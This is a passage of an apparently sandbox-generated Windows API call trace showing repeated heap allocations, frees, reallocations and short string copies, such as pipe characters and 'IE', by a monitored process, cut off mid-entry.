[0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613770 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6184d0 | out: hHeap=0x5f0000) returned 1 [0181.461] lstrlenA (lpString="\n") returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.461] lstrcpyA (in: lpString1=0x61f580, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.461] lstrlenA (lpString="\n") returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f540 [0181.462] lstrcpyA (in: lpString1=0x61f540, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f670 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f480 [0181.462] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.462] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.462] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x5) returned 0x61f520 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f670, Size=0x2) returned 0x61f660 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.462] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] GetProcessHeap () returned 0x5f0000 [0181.462] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.463] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.463] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x9) returned 0x61f640 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.463] lstrlenA (lpString="/") returned 1 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f490 [0181.463] lstrcpyA (in: lpString1=0x61f490, lpString2="/" | out: lpString1="/") returned="/" [0181.463] lstrlenA (lpString="") returned 0 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.463] lstrcpyA (in: lpString1=0x61f520, lpString2="" | out: lpString1="") returned="" [0181.463] lstrlenA (lpString="") returned 0 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f670 [0181.463] lstrcpyA (in: lpString1=0x61f670, lpString2="" | out: lpString1="") returned="" [0181.463] lstrlenA (lpString="") returned 0 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.463] lstrcpyA (in: lpString1=0x61f600, lpString2="" | out: lpString1="") returned="" [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.463] lstrlenA (lpString="") returned 0 [0181.463] GetProcessHeap () returned 0x5f0000 [0181.463] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5b0 [0181.463] lstrcpyA (in: lpString1=0x61f5b0, lpString2="" | out: lpString1="") returned="" [0181.464] lstrlenA (lpString="") returned 0 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f630 [0181.464] lstrcpyA (in: lpString1=0x61f630, lpString2="" | out: lpString1="") returned="" [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.464] lstrlenA (lpString="\r\n") returned 2 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f620 [0181.464] lstrcpyA (in: lpString1=0x61f620, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.464] lstrlenA (lpString="||") returned 2 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f580 [0181.464] lstrcpyA (in: lpString1=0x61f580, lpString2="||" | out: lpString1="||") returned="||" [0181.464] lstrlenA (lpString="|") returned 1 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f670 [0181.464] lstrcpyA (in: lpString1=0x61f670, lpString2="|" | out: lpString1="|") returned="|" [0181.464] lstrlenA (lpString="") returned 0 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f480 [0181.464] lstrcpyA (in: lpString1=0x61f480, lpString2="" | out: lpString1="") returned="" [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f620 [0181.464] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.464] GetProcessHeap () returned 0x5f0000 [0181.464] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.465] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.465] lstrlenA (lpString="") returned 0 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.465] lstrcpyA (in: lpString1=0x61f490, lpString2="" | out: lpString1="") returned="" [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f4a0 [0181.465] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.465] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.465] lstrlenA (lpString="|") returned 1 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.465] lstrcpyA (in: lpString1=0x61f4a0, lpString2="|" | out: lpString1="|") returned="|" [0181.465] lstrlenA (lpString="") returned 0 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.465] lstrcpyA (in: lpString1=0x61f510, lpString2="" | out: lpString1="") returned="" [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f620 [0181.465] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.465] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.465] lstrlenA (lpString="") returned 0 [0181.465] GetProcessHeap () returned 0x5f0000 [0181.465] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.466] lstrcpyA (in: lpString1=0x61f520, lpString2="" | out: lpString1="") returned="" [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f620 [0181.466] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.466] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.466] lstrlenA (lpString="|") returned 1 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.466] lstrcpyA (in: lpString1=0x61f590, lpString2="|" | out: lpString1="|") returned="|" [0181.466] lstrlenA (lpString="|") returned 1 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f530 [0181.466] lstrcpyA (in: lpString1=0x61f530, lpString2="|" | out: lpString1="|") returned="|" [0181.466] lstrlenA (lpString="|") returned 1 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f540 [0181.466] lstrcpyA (in: lpString1=0x61f540, lpString2="|" | out: lpString1="|") returned="|" [0181.466] lstrlenA (lpString="|") returned 1 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.466] lstrcpyA (in: lpString1=0x61f5a0, lpString2="|" | out: lpString1="|") returned="|" [0181.466] lstrlenA (lpString="|") returned 1 [0181.466] GetProcessHeap () returned 0x5f0000 [0181.466] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f550 [0181.466] lstrcpyA (in: lpString1=0x61f550, lpString2="|" | out: lpString1="|") returned="|" [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.467] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.467] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.467] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f560, Size=0x1) returned 0x61f5b0 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f560 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f620 [0181.467] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.467] GetProcessHeap () returned 0x5f0000 [0181.468] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.468] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.468] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f560, Size=0xb) returned 0x61f5c0 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5d0 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f560 [0181.468] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f560 [0181.468] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.468] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.468] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0xb) returned 0x61f560 [0181.468] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5c0 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.469] lstrlenA (lpString="") returned 0 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f560 [0181.469] lstrcpyA (in: lpString1=0x61f560, lpString2="" | out: lpString1="") returned="" [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f760 [0181.469] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f760 | out: hHeap=0x5f0000) returned 1 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f830 [0181.469] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f830 | out: hHeap=0x5f0000) returned 1 [0181.469] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0x1) returned 0x61f690 [0181.469] lstrlenA (lpString="") returned 0 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.469] lstrcpyA (in: lpString1=0x61f620, lpString2="" | out: lpString1="") returned="" [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f730 [0181.469] GetProcessHeap () returned 0x5f0000 [0181.469] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f850 [0181.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f850 | out: hHeap=0x5f0000) returned 1 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f7d0 [0181.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7d0 | out: hHeap=0x5f0000) returned 1 [0181.470] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f730, Size=0x1) returned 0x61f7a0 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f730 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f820 [0181.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f820 | out: hHeap=0x5f0000) returned 1 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f7e0 [0181.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.470] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7e0 | out: hHeap=0x5f0000) returned 1 [0181.470] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f730, Size=0x1) returned 0x61f870 [0181.470] lstrlenA (lpString="IE") returned 2 [0181.470] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f6f0 [0181.471] lstrcpyA (in: lpString1=0x61f6f0, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636060 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f790 [0181.471] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f790 | out: hHeap=0x5f0000) returned 1 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f810 [0181.471] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f810 | out: hHeap=0x5f0000) returned 1 [0181.471] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636060, Size=0x11) returned 0x6360a0 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636080 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636080, Size=0x23) returned 0x613950 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636420 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636420, Size=0x27) returned 0x6137a0 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636080 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636080, Size=0x29) returned 0x613aa0 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.471] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636080 [0181.471] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636260 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x2b) returned 0x613980 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x6362e0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x636200 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636200, Size=0x2d) returned 0x613860 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x6361c0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x636280 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636280, Size=0x2f) returned 0x613bf0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6360c0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360c0, Size=0x43) returned 0x620280 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613b30 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b30, Size=0x45) returned 0x620140 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613c20 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613c20, Size=0x59) returned 0x618a10 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613680 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613680, Size=0x5b) returned 0x618710 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613680 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613ad0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.472] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613ad0, Size=0x5f) returned 0x6187d0 [0181.472] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613680 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618a10 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620140 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620280 | out: 